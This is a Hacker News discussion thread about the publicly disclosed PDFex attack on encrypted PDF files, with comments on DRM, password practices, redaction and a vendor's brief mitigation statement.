
New PDFex attack can exfiltrate data from encrypted PDF files - lelf
https://www.zdnet.com/article/new-pdfex-attack-can-exfiltrate-data-from-encrypted-pdf-files/
======
userbinator
Good riddance, the only thing I've ever seen PDF encryption used for is DRM.
In my mind, anything that breaks DRM is a bonus.

~~~
morpheuskafka
I know of one organization that uses it to enable early release of a time-
embargoed document to prevent server overload when it's released. Instead,
everyone downloads the document in advance and they release the password at
the release time.

~~~
snissn
They should use a cdn

~~~
notzuck
The first method sounds simpler and cheaper. You're over engineering.

~~~
therein
I hope you're joking but it is not over-engineering if you're the kind of
organization important enough to have the need to release time-embargoed
documents on regular basis.

Besides, he didn't suggest they bootstrap their own CDN. It could be as simple
as creating a Cloudflare account.

~~~
notzuck
Not joking. If the years have taught me anything that would be pragmatism. You
want to introduce a new vendor and cost centre for what? Send your docs out
early followed by a password if that's secure 'enough' for your use case.

Any further guesses as to how "important" the organisation is is pointless in
the absence of understanding the actual use case.

------
moftz
FIRST Robotics Competition used to distribute the rulebook for the season in
an encrypted PDF. The password and unencrypted copies were released after the
live kickoff stream. Ten years ago we'd be busting ass trying to crack the PDF
but techniques weren't great then.

~~~
pietroglyph
FRC was the thing I immediately thought about when I saw this (they still do
PDF encryption), but the techniques here don't really apply.

I'm pretty sure that you _could_ just try to brute force it, as the passwords
as usually dictionary-based with substitutions (e.g. R0bot$InSp&ce).

Edit: After taking a much more in-depth look at it, all of the past game
manuals' passwords are too complex to crack in a reasonable time (even with a
dictionary). With a top 1000 word list dictionary with substitutions of
3-letter words like the above there are (conservatively) 1x10^20 combinations.
You can't crack the PDF user key directly either, because recent game manuals
use 256-bit AES keys.

------
reilly3000
I've always operated under the assumption that nothing in a PDF is secure, and
that the only safe way to redact something from one is to print it and rescan
it. Convince me otherwise?

~~~
bepvte
I believe that if you edit the pdf so that the thing you are redacting is no
longer in the pdf file, it is safely redacted. Printing a pdf and rescanning a
pdf breaks text selection and screen readers, and basically makes it into a
fancy PNG.

~~~
munk-a
There is a bunch of data in PDFs that may have previously been visible but is
no longer. I know that there are also fun meta-data attributes embedded on a
per-page and per document basis - and also that PDFs can be portfolio
documents where such a document will often contain no longer referenced PDFs
that became irrelevant to the PDF. The file format is pretty crazy.

------
ropiwqefjnpoa
Who would have imagined we'd have "branded" exploits in the future?

~~~
skavi
Vulnerabilities have been branded for some time now.

[https://github.com/hannob/vulns](https://github.com/hannob/vulns)

~~~
ropiwqefjnpoa
I still consider 2011 "the future"

------
andrekandre
from the list, looks like preview.app/skim is the least affected... i wonder
if that’s because it’s just lacking dynamic features of the others, or it’s
just coded better, or it’s because macOS security defaults...

------
taxidump
A company I was a contractor for would send payment invoices with a password.
The password was the last four digits of the ID number specific to the
contractor. Our CRM we all used had every contractors ID number in their
profile publicly available. When I asked what the point was I was told upper
management required a password and this was the easiest.

------
xvilka
At the same time no open source PDF reader can handle all cases of embedded
animation and PDF forms[1].

[1]
[https://gitlab.freedesktop.org/poppler/poppler/issues?label_...](https://gitlab.freedesktop.org/poppler/poppler/issues?label_name%5B%5D=forms)

------
mettamage
Ehm, what is an exfiltration channel? I know what a sidechannel is, but I
haven't heard of exfiltration channel.

~~~
otakucode
Just a channel that is used for exfiltration. It's not a specific sort of
thing.

------
MartinMond
PSPDFKit CTO here. TL;DR on the PDFex vulnerability: The file format can carry
both encrypted and unencrypted parts, which allows "injecting" malicious
payload (embedded JavaScript, PDF forms that submit to remote URLs, etc) into
an encrypted PDF that then can be used to exfiltrate the encrypted PDF parts,
after the user decrypted the file (= entered the password).

We're currently investigating the vulnerability in detail and plan to ship an
update ASAP that will allow our customers to mitigate it.

I'll be monitoring this thread to answer any questions.

------
mistrial9
spies! everywhere! honestly, as someone who cares about typography and culture
in print, the constant and relentless "spies everywhere" statements from the
security community look more and more like a sickness, not a defense. PDF was
designed for print integrity, with images and typesetting, and I am grateful
for it everyday. Please calm your alarmist content, and yes, security is
necessary.. a good servant and a bad master, I would say.

~~~
kevin_thibedeau
Then they added JavaScript and made it Turing complete, completely negating
the effort to eliminate the general computability of Postscript.

~~~
otakucode
Not to mention the capability to execute any arbitrary executable.

------
WhiteOwlLion
I just remove the password with a command line tool without needing to know
the password.

~~~
lxgr
This tool likely only works for "passwordless" PDF encryption/protection,
which restricts some aspect of using the document (printing, exporting single
pages etc).

This is the domain of DRM/whitebox cryptography, and leaving aside all
discussions about the feasibility of such efforts, PDF's implementation of it
can safely be assumed to be broken – the master key used can be found in
several open source PDF tools' source code and on Stack Overflow, among other
places.

I assume the attacks presented in the paper are about the other type of PDF
encryption, which requires a password to even display the protected content,
which could definitely be done in a way not vulnerable to the attacks
described.

~~~
poizan42
The "master key" is just the empty password which means that the effective key
is all padding. This is documented in section 7.6.3.3 of ISO 32000-1:2008
(available for free from Adobe's website). There was never any real attempt to
keep it secret.

